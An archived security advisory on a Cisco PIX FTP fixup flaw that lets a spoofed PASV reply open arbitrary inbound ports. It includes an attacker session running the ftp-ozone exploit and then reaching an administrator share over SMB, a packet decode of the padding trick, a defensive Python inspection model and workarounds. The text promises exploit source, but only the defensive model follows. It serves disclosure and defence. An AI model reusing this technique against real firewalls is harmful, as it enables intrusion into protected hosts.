COMMAND

    PIX

SYSTEMS AFFECTED

    Cisco

PROBLEM

    Eric Monti confirmed and did some more research regarding the  PIX
    hole described by Jacek Lipkowski on Bugtraq.  That posting is
    available at:

        http://oliver.efri.hr/~crv/security/bugs/Others/fw-13.html

    Eric was able to verify that the PIX is vulnerable to the FTP  PASV
    vulnerability that has recently been discussed on the Bugtraq
    mailing list.  Here are his notes and findings.

    In a nutshell, the PIX can be fooled into opening ports for inbound
    connections to a DMZ FTP server if the FTP server can be tricked
    into sending back what looks like a valid "227
    (xxx,xxx,xxx,xxx,prt,prt)" response.  The problem on the PIX is that
    the 'fixup protocol ftp' component does not perform sufficient
    checks to verify PASV replies before creating a dynamic hole through
    the firewall.  Note that there are several ways to get the FTP
    server to generate the message that triggers the PIX's insecure
    behaviour.  The exploit used for testing was Dug Song's ftp-ozone.c
    (available at the link above).

    The PIX tested runs software version 4.4(4).  Other versions have
    not been tested but are most likely vulnerable.

    Here is the session from the attacker.  "ftp-ozone" is the public
    exploit from Dug Song.  Eric made a few minor 'aesthetic'
    adjustments and added support for anonymous login with '-l'
    (although it wasn't used in this example).  The source code is
    below.

        --------------Exploit Launched-----------------
        [root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
        220 victim Microsoft FTP Service (Version 4.0).
        
        Garbage packet contains:
        500 '...........................................................................................................................
        
        Money packet contains:
        227 (10,1,2,3,0,139)': command not understood
        
        
        -------------Opened port connected (NBT)-------
        [root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
        Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
        Password: ********
        Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
        smb: \> dir
          AUTOEXEC.BAT                        A       0  Mon Mar 13 03:22:58 2000
          boot.ini                          ASR     279  Mon Mar 13 03:15:07 2000
          CONFIG.SYS                          A       0  Mon Mar 13 03:22:58 2000
          IO.SYS                           AHSR       0  Mon Mar 13 03:22:58 2000
          MSDOS.SYS                        AHSR       0  Mon Mar 13 03:22:58 2000
          MSSCE                               D       0  Tue Mar  7 14:29:57 2000
          NTDETECT.COM                     AHSR   26816  Tue Mar  7 11:47:49 2000
          ntldr                            AHSR  156496  Tue Mar  7 11:47:49 2000
          pagefile.sys                        A1073741824  Tue Mar  7 11:51:51 2000
          Program Files                       D       0  Tue Mar  7 11:35:11 2000
          RECYCLER                          DHS       0  Mon Mar 13 09:35:51 2000
          TEMP                               DA       0  Tue Mar  7 14:36:31 2000
          WINNT                               D       0  Tue Mar  7 14:30:05 2000
        
                        64706 blocks of size 65536. 43841 blocks available
        smb: \> quit

    As you can see above, once the manipulated reply generated from the
    FTP server by ftp-ozone has passed back through the PIX, we are able
    to connect to the NBT (tcp/139) service and access a share.  On the
    PIX with 'logging console debug' set, this was all that showed up,
    i.e. only the control connection was logged:

        302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139
        gaddr 10.1.2.3/21 laddr 192.168.205.2/21

    Below is a packet decode generated from a tcpdump -w capture.  The
    IPs used are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
    victim-real=192.168.205.2 (does not appear in the decode).

    The PIX sits between 10.1.2.4 and 192.168.205.2.

    In packet #11 of the decode, in the TCP data segment, you can see
    what triggers the PIX's insecure behaviour: "227 (10,1,2,3,0,139)':
    command not understood."  The server is echoing the bogus command it
    received in packets 6 and 8 back inside a single "500 '...': command
    not understood" error line.  Because the attacker advertised a TCP
    window of only 128 bytes and padded the command with 123 bytes of
    garbage, "500 '" plus the padding fills packet 9 exactly and the
    "227 (10,1,2,3,0,139)" tail lands at the very start of packet 11.

    This confirms what was assumed: the only check the PIX makes before
    creating a dynamic PASV conduit is whether "227
    (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of a packet,
    regardless of whether that packet begins a reply line or whether
    the client ever issued a PASV command (in this session it did not).
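    The following is an added illustration, not code from this advisory,
    from Cisco or from ftp-ozone.  It models what an FTP fixup sees on
    the server-to-client control channel and contrasts the per-packet
    prefix check inferred above for PIX 4.4(4) with an inspector that
    reassembles the stream into reply lines and validates a 227 reply
    before opening anything.  The two server segments are reconstructed
    from packets 9 and 11 of the decode below (their exact bytes are
    approximated); the addresses, the StrictInspector class and the
    check list it applies are assumptions made for the example.

```python
# Added example, not code from the advisory, from Cisco or from ftp-ozone.
# It models what an FTP "fixup" sees on the control channel and contrasts the
# per-packet prefix check the advisory observed on PIX 4.4(4) with a check that
# reassembles the stream and validates the PASV reply before opening anything.
import re
from dataclasses import dataclass, field

# Server->client segments reconstructed from packets 9 and 11 of the decode
# (contents approximated). 5 + 123 = 128 bytes, the window the attacker
# advertised, so the server's single error line is split exactly there.
PADDING = b"." * 123
ATTACK_SEGMENTS = [
    b"500 '" + PADDING,                                    # packet 9
    b"227 (10,1,2,3,0,139)': command not understood\r\n",  # packet 11
]

# "227 ... (h1,h2,h3,h4,p1,p2)" as in RFC 959; the text before the tuple varies.
PASV_RE = re.compile(
    rb"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def pasv_endpoint(line: bytes):
    """Return (host, port) if `line` begins with a 227 reply, else None."""
    m = PASV_RE.match(line)
    if not m:
        return None
    host = ".".join(m.group(i).decode() for i in range(1, 5))
    port = (int(m.group(5)) << 8) | int(m.group(6))
    return host, port


def naive_inspect(segments):
    """Per-segment check: a 227 tuple at the start of any segment opens a hole.
    This is the behaviour the advisory infers for PIX 4.4(4)."""
    return [ep for ep in map(pasv_endpoint, segments) if ep]


@dataclass
class StrictInspector:
    """Line-oriented inspection with the checks a fixup should make (assumed)."""
    server_ip: str                 # address the server is reachable at (gaddr)
    client_ip: str                 # the only peer allowed to use the hole
    pasv_pending: bool = False     # client's last command was PASV, reply awaited
    buf: bytes = b""
    holes: list = field(default_factory=list)
    alerts: list = field(default_factory=list)

    def client_sent(self, data: bytes):
        # A data connection is legitimate only as the reply to a PASV command.
        self.pasv_pending = data.strip().upper() == b"PASV"

    def server_sent(self, segment: bytes):
        # Reassemble first; a reply is judged by how its *line* starts.
        self.buf += segment
        while b"\n" in self.buf:
            line, _, self.buf = self.buf.partition(b"\n")
            self._reply(line.rstrip(b"\r"))

    def _reply(self, line: bytes):
        if b"227 (" in line and not line.startswith(b"227 "):
            self.alerts.append("PASV tuple embedded in a %s reply" % line[:3].decode())
        pending, self.pasv_pending = self.pasv_pending, False
        ep = pasv_endpoint(line)
        if ep is None:
            return
        host, port = ep
        if not pending:
            self.alerts.append("227 reply with no PASV outstanding")
        elif host != self.server_ip:
            self.alerts.append("227 names %s, control channel is to %s" % (host, self.server_ip))
        elif port < 1024:
            self.alerts.append("227 offers privileged port %d" % port)
        else:
            # One-shot pinhole: client_ip -> host:port only.
            self.holes.append((self.client_ip, host, port))


def run(events, server_ip="10.1.2.3", client_ip="10.1.2.4"):
    """events: list of ("C"|"S", bytes). Returns the inspector after the exchange."""
    insp = StrictInspector(server_ip, client_ip)
    for who, data in events:
        (insp.client_sent if who == "C" else insp.server_sent)(data)
    return insp


# Constructed exchanges: the ftp-ozone run from the decode, and an honest PASV.
ATTACK = [("C", PADDING + b"227 (10,1,2,3,0,139)\r\n")] + [("S", s) for s in ATTACK_SEGMENTS]
LEGIT = [("C", b"PASV\r\n"), ("S", b"227 Entering Passive Mode (10,1,2,3,4,1)\r\n")]

if __name__ == "__main__":
    print("naive :", naive_inspect(ATTACK_SEGMENTS))        # [('10.1.2.3', 139)]
    a, l = run(ATTACK), run(LEGIT)
    print("strict:", a.holes, a.alerts)                     # [] plus an alert
    print("legit :", l.holes, l.alerts)                     # one hole to 1025, no alerts
```

    The naive inspector opens tcp/139 from the second segment alone; the
    strict one never sees a line that starts with "227" because the
    reassembled line starts with "500 '", and it additionally refuses a
    227 that was not preceded by PASV, that names a host other than the
    server, or that offers a privileged port.  Note that the port check
    on its own would not stop an attacker who chose a high-numbered
    service; the reassembly and the outstanding-PASV check are what
    close the hole.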

    Here is the decode:

        Packet 1
	        Timestamp:			15:02:37.130283
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		60 bytes
	        Identification:			0x04CF
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D4C
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403974
	        Acknowledgement Number:		0000000000
	        Header Length:			40 bytes (data=0)
	        Flags:				URG=off, ACK=off, PSH=off
					        RST=off, SYN=on,  FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x78CB
	        Urgent Pointer:			0
	        <Options not displayed>
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 2
	        Timestamp:			15:02:37.130720
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		44 bytes
	        Identification:			0x4311
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9F19
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576390
	        Acknowledgement Number:		1818403975
	        Header Length:			24 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=on,  FIN=off
	        Window Advertisement:		8760 bytes
	        Checksum:			0x8CFE
	        Urgent Pointer:			0
	        <Options not displayed>
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 3
	        Timestamp:			15:02:37.130765
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D0
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5F
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576391
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC673
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 4
	        Timestamp:			15:02:37.131178
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		88 bytes
	        Identification:			0x4411
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9DED
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576391
	        Acknowledgement Number:		1818403975
	        Header Length:			20 bytes (data=48)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8760 bytes
	        Checksum:			0x0458
	        Urgent Pointer:			0
        TCP Data
	        220 wapp2 Microsoft FTP Service (Version 4.0)..
        
        -----------------------------------------------------------------
        Packet 5
	        Timestamp:			15:02:37.131204
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D1
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5E
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		80 bytes
	        Checksum:			0xC673
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 6
	        Timestamp:			15:02:47.126818
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		163 bytes
	        Identification:			0x04D2
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1CE2
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=123)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x96BF
	        Urgent Pointer:			0
        TCP Data
	        ...........................................................................................................................
        -----------------------------------------------------------------
        Packet 7
	        Timestamp:			15:02:47.248131
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x4511
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9D1D
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576439
	        Acknowledgement Number:		1818404098
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8637 bytes
	        Checksum:			0xA48B
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 8
	        Timestamp:			15:02:47.248184
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		69 bytes
	        Identification:			0x04D3
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D3F
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404098
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=29)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x2602
	        Urgent Pointer:			0
        TCP Data
	        227 (10,1,2,3,0,139).
        
        -----------------------------------------------------------------
        Packet 9
	        Timestamp:			15:02:47.248558
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		168 bytes
	        Identification:			0x4611
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9B9D
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576439
	        Acknowledgement Number:		1818404127
	        Header Length:			20 bytes (data=128)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8608 bytes
	        Checksum:			0x168C
	        Urgent Pointer:			0
        TCP Data
	        500 '...........................................................................................................................
        -----------------------------------------------------------------
        Packet 10
	        Timestamp:			15:02:47.248599
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D4
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5B
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404127
	        Acknowledgement Number:		1212576567
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC52B
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 11
	        Timestamp:			15:02:47.248836
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		94 bytes
	        Identification:			0x4711
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9AE7
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576567
	        Acknowledgement Number:		1818404127
	        Header Length:			20 bytes (data=54)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8608 bytes
	        Checksum:			0x1DD1
	        Urgent Pointer:			0
        TCP Data
	        227 (10,1,2,3,0,139)': command not understood.
        
        -----------------------------------------------------------------
        Packet 12
	        Timestamp:			15:02:47.266742
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D5
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5A
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404127
	        Acknowledgement Number:		1212576621
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC4F5
	        Urgent Pointer:			0
        TCP Data
	        <No data>

SOLUTION

    Essentially this is the same as the more widely publicized
    Firewall-1 incarnation of the hole (without their patch), only
    there are a few major differences to note:

        1. The port opened will allow bi-directional traffic (confirmed
           in PIX 4.4(4), probably others as well).
        2. *ANY* port can be opened, even low-numbered and well-known
           ports.  This could be worked around with a conduit ACL using
           explicit denies on the external interface, although that
           only protects the ports you explicitly deny.
        3. The 'fixup protocol ftp' feature appears to be the core of
           this problem on the PIX side.  It is what handles PASV FTP on
           the PIX, and if it is disabled the exploit (in any version)
           will not work.  If you disable it, though, there are two
           things to note:
           - Outbound FTP connections from the inside *have* to be made
             with PASV FTP clients.
           - Inbound FTP connections from the outside world cannot use
             PASV.

    There may be other workarounds than those cited above.